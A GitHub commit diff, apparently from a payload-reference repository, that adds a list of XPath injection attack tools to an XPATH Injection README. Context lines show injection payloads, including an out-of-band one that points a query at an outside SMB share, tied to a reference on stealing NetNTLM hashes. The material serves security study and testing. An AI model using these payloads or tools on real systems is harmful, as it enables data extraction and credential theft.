Merge pull request swisskyrepo#111 from noraj/patch-1

XPATH: add tools
eznj · Oct 26, 2019 · 56ec623 · 56ec623
2 parents 68f1a17 + 525429c
commit 56ec623
Showing 1 changed file with 9 additions and 1 deletion.
diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md
@@ -7,6 +7,7 @@
 * [Exploitation](#exploitation)
 * [Blind exploitation](#blind-exploitation)
 * [Out Of Band Exploitation](#out-of-band-exploitation)
+* [Tools](#tools)
 * [References](#references)
 
 ## Exploitation
@@ -47,8 +48,15 @@ x' or name()='username' or 'x'='y
 http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
 ```
 
+## Tools
+
+- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
+- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool 
+- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text 
+- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
+- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
+
 ## References
 
 * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
-* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
 * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)